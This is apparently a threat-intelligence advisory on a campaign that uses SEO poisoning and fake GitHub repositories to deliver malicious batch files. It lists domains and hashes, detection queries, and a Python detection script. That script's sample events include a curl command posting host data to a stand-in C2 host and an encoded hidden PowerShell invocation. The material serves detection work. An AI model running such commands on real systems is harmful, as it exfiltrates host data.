Attack Chain Targets Users Searching for Legitimate Tools

    Date: 01/28/2026

    Severity: High

    Summary

    We uncovered an attack chain that uses SEO poisoning to lure users who are searching for legitimate software. The threat actors abuse GitHub by hosting malicious ZIP archives in fake repositories. Each archive impersonates a real application and contains a malicious batch (.bat) file. When the user runs it, the .bat file posts host information to a command-and-control (C2) server with cURL and then runs an encoded PowerShell script for reconnaissance. In at least one case, the C2 server delivered a TeamViewer binary to give the operator remote access. Because every later stage is launched by the user-executed batch file, the process lineage (cmd.exe running a .bat extracted from the downloaded archive, then spawning curl.exe and powershell.exe with an encoded command) is a more durable hunting pivot than the domains and hashes below, which should be expected to rotate. Note also that TeamViewer is a legitimate remote-administration tool: judge its presence by how it arrived on the host, not by the binary alone.

    Indicators of Compromise (IOC) List

    Domains/URLs:

    2tnl.digital

    ankaraotogaleri.com

    antipolitical.com

    base22.digital

    bestebettingsider.com

    brandingsolutions.com

    globalcharts.com

    rasprod.com

    systemsheuristics.com

    Hashes (SHA-256):

    5e784d9dcdf69fd3bc0d59f94e1fbdc05f83fc5d7ba44e6be51ec3e4d3d0ac38

    32999b06c7bb172bbbba46018caad8cdfe6ccd3c84eee08232ff7944680caa37

    27f3bd706e1a348f17b2b652f889bf576e5ccd31d3742a9b560f01b7f7d0f022

    7d955361c3d264097ee0622b42d40671a8c63098f59986e4c89f4aaec236f638

    717f41263c630b22264936f8737db51169d9947231390a9c1fbf931642ac36af

    cdd0250c6894180d6c3462d2e01fd82ade61a0e2660baac886c5d96460fc4507

    18f708032d184fafd9bbbe21863e07081b2a3cab5c130c953281bb67d4e48ff0

    23d260b2709be0a4d8acff4eafabc8f90b66553e2a4c72aa368260cefb8a7772

    3a978ffb4931a9441c963c011e4b2b434e860b8d492740acf376b683dcbf314a

    3e86e50cd29c266813f1167448be817acfee1c7416062d5836f094bedf1d56eb

    555a54ab1a29d069bd0138731849d0ae55cdd67a8733de6fb9f5de0a3feefbfc

    5bd813331102e380851b9549cb85e00a6a1ffc0bfa3d7a6aa292a339693bf668

    9513fd19cff090402ccf0f776ed140a9dfa4a296a75480d2130e9420ac2165a0

    d003f07424b89f05b508e589ea077a074933029d8162e4f3cf97567a1e99b497

    ee403407691a1630baad10b91acde2d5040b7173dd967cc456d60382ee9723a3

    fe4301d5a21c1fc81ad56c4b7806c54c9a7d82221b6566562df2b4bfbad27462

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1:

    domainname like "antipolitical.com" or url like "antipolitical.com" or siteurl like "antipolitical.com" or domainname like "2tnl.digital" or url like "2tnl.digital" or siteurl like "2tnl.digital" or domainname like "ankaraotogaleri.com" or url like "ankaraotogaleri.com" or siteurl like "ankaraotogaleri.com" or domainname like "base22.digital" or url like "base22.digital" or siteurl like "base22.digital" or domainname like "bestebettingsider.com" or url like "bestebettingsider.com" or siteurl like "bestebettingsider.com" or domainname like "brandingsolutions.com" or url like "brandingsolutions.com" or siteurl like "brandingsolutions.com" or domainname like "globalcharts.com" or url like "globalcharts.com" or siteurl like "globalcharts.com" or domainname like "rasprod.com" or url like "rasprod.com" or siteurl like "rasprod.com" or domainname like "systemsheuristics.com" or url like "systemsheuristics.com" or siteurl like "systemsheuristics.com"

    Detection Query 2:

    sha256hash IN ("32999b06c7bb172bbbba46018caad8cdfe6ccd3c84eee08232ff7944680caa37","18f708032d184fafd9bbbe21863e07081b2a3cab5c130c953281bb67d4e48ff0","9513fd19cff090402ccf0f776ed140a9dfa4a296a75480d2130e9420ac2165a0","fe4301d5a21c1fc81ad56c4b7806c54c9a7d82221b6566562df2b4bfbad27462","cdd0250c6894180d6c3462d2e01fd82ade61a0e2660baac886c5d96460fc4507","d003f07424b89f05b508e589ea077a074933029d8162e4f3cf97567a1e99b497","7d955361c3d264097ee0622b42d40671a8c63098f59986e4c89f4aaec236f638","5e784d9dcdf69fd3bc0d59f94e1fbdc05f83fc5d7ba44e6be51ec3e4d3d0ac38","3e86e50cd29c266813f1167448be817acfee1c7416062d5836f094bedf1d56eb","23d260b2709be0a4d8acff4eafabc8f90b66553e2a4c72aa368260cefb8a7772","ee403407691a1630baad10b91acde2d5040b7173dd967cc456d60382ee9723a3","5bd813331102e380851b9549cb85e00a6a1ffc0bfa3d7a6aa292a339693bf668","717f41263c630b22264936f8737db51169d9947231390a9c1fbf931642ac36af","27f3bd706e1a348f17b2b652f889bf576e5ccd31d3742a9b560f01b7f7d0f022","555a54ab1a29d069bd0138731849d0ae55cdd67a8733de6fb9f5de0a3feefbfc","3a978ffb4931a9441c963c011e4b2b434e860b8d492740acf376b683dcbf314a")
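    The two queries above, together with the batch-file chain from the Summary, as an added offline example (this is not Gurucul's or Unit 42's code): the IOC domains and hashes from the lists above are matched against constructed log records, using a label-boundary domain match so that cdn.rasprod.com fires but notrasprod.com does not, plus a behavioral rule for cmd.exe running a .bat that spawns curl.exe or an encoded PowerShell command. The field names (domainname, url, siteurl and sha256hash as used by the queries; parent_image, parent_commandline, image and commandline as Sysmon/EDR-style process fields), the rule labels, and every sample event are assumptions made for the example.

```python
# Added example, not Gurucul's or Unit 42's code; field names and sample events are constructed.
import re
from urllib.parse import urlsplit

IOC_DOMAINS = {  # copied from the Domains/URLs list above
    "2tnl.digital", "ankaraotogaleri.com", "antipolitical.com", "base22.digital",
    "bestebettingsider.com", "brandingsolutions.com", "globalcharts.com",
    "rasprod.com", "systemsheuristics.com",
}
IOC_SHA256 = {  # copied from the SHA-256 list above
    "5e784d9dcdf69fd3bc0d59f94e1fbdc05f83fc5d7ba44e6be51ec3e4d3d0ac38",
    "32999b06c7bb172bbbba46018caad8cdfe6ccd3c84eee08232ff7944680caa37",
    "27f3bd706e1a348f17b2b652f889bf576e5ccd31d3742a9b560f01b7f7d0f022",
    "7d955361c3d264097ee0622b42d40671a8c63098f59986e4c89f4aaec236f638",
    "717f41263c630b22264936f8737db51169d9947231390a9c1fbf931642ac36af",
    "cdd0250c6894180d6c3462d2e01fd82ade61a0e2660baac886c5d96460fc4507",
    "18f708032d184fafd9bbbe21863e07081b2a3cab5c130c953281bb67d4e48ff0",
    "23d260b2709be0a4d8acff4eafabc8f90b66553e2a4c72aa368260cefb8a7772",
    "3a978ffb4931a9441c963c011e4b2b434e860b8d492740acf376b683dcbf314a",
    "3e86e50cd29c266813f1167448be817acfee1c7416062d5836f094bedf1d56eb",
    "555a54ab1a29d069bd0138731849d0ae55cdd67a8733de6fb9f5de0a3feefbfc",
    "5bd813331102e380851b9549cb85e00a6a1ffc0bfa3d7a6aa292a339693bf668",
    "9513fd19cff090402ccf0f776ed140a9dfa4a296a75480d2130e9420ac2165a0",
    "d003f07424b89f05b508e589ea077a074933029d8162e4f3cf97567a1e99b497",
    "ee403407691a1630baad10b91acde2d5040b7173dd967cc456d60382ee9723a3",
    "fe4301d5a21c1fc81ad56c4b7806c54c9a7d82221b6566562df2b4bfbad27462",
}
# powershell.exe accepts -EncodedCommand and its prefixes (-e, -ec, -enc, ...).
ENCODED_PS = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n[a-z]*)?(?=\s|$)")


def hostname_of(value):
    """Lower-cased host of a URL or bare domain (a '//' prefix lets urlsplit parse a bare host)."""
    value = value.strip().lower()
    return urlsplit(value if "://" in value else "//" + value).hostname or ""


def ioc_domain_hit(value):
    """Match on a label boundary: 'cdn.rasprod.com' hits, 'notrasprod.com' does not."""
    host = hostname_of(value)
    for domain in IOC_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def rule_domain(event):
    """Query 1: any of domainname / url / siteurl resolves to an IOC domain."""
    for field in ("domainname", "url", "siteurl"):
        hit = ioc_domain_hit(event.get(field) or "")
        if hit:
            return f"ioc-domain:{hit}"
    return None


def rule_hash(event):
    """Query 2: sha256hash is in the IOC set; lower-cased so uppercase hashes still match."""
    digest = (event.get("sha256hash") or "").strip().lower()
    return f"ioc-sha256:{digest[:12]}" if digest in IOC_SHA256 else None


def rule_bat_chain(event):
    """Summary chain: cmd.exe running a .bat spawns curl.exe or an encoded PowerShell command."""
    parent_image = (event.get("parent_image") or "").lower()
    parent_cmd = (event.get("parent_commandline") or "").lower()
    image = (event.get("image") or "").lower()
    if not (parent_image.endswith("cmd.exe") and ".bat" in parent_cmd):
        return None
    if image.endswith("curl.exe"):
        return "bat-spawns-curl"
    if image.endswith("powershell.exe") and ENCODED_PS.search(event.get("commandline") or ""):
        return "bat-spawns-encoded-powershell"
    return None


def run_rules(events):
    """Return (event id, rule label) for every rule that fires, in input order."""
    hits = []
    for event in events:
        for rule in (rule_domain, rule_hash, rule_bat_chain):
            label = rule(event)
            if label:
                hits.append((event["id"], label))
    return hits


BAT = r'cmd.exe /c "C:\Users\user\Downloads\tool\setup.bat"'  # constructed parent command line
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed web/DNS records, file hashes and process creations
    {"id": 1, "siteurl": "https://rasprod.com/download/setup.zip"},
    {"id": 2, "url": "https://cdn.base22.digital/update"},
    {"id": 3, "domainname": "notrasprod.com"},  # near miss, must not fire
    {"id": 4, "sha256hash": "5E784D9DCDF69FD3BC0D59F94E1FBDC05F83FC5D7BA44E6BE51EC3E4D3D0AC38"},
    {"id": 6, "parent_image": r"C:\Windows\System32\cmd.exe", "parent_commandline": BAT,
     "image": r"C:\Windows\System32\curl.exe",
     "commandline": "curl.exe -s -X POST -d @hostinfo.txt http://c2.example.invalid/"},
    {"id": 7, "parent_image": r"C:\Windows\System32\cmd.exe", "parent_commandline": BAT,
     "image": PS, "commandline": "powershell.exe -nop -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="},
    {"id": 8, "parent_image": r"C:\Windows\explorer.exe", "parent_commandline": "explorer.exe",
     "image": PS, "commandline": "powershell.exe -ExecutionPolicy Bypass -File deploy.ps1"},
]

if __name__ == "__main__":
    for event_id, label in run_rules(SAMPLE_EVENTS):
        print(f"event {event_id}: {label}")
```

    Run it directly to print the hits. Several of the listed domains are generic-looking names (brandingsolutions.com, globalcharts.com), so treat a domain hit as a lead to triage against the Unit 42 reference rather than as confirmation of compromise; the behavioral rule is the one most likely to keep firing once the actors rotate their infrastructure and rebuild the archives.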

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-01-22-Attack-chain-targeting-users-looking-for-legitimate-tools.txt


    Tags

    Malware, SEO Poisoning, GitHub
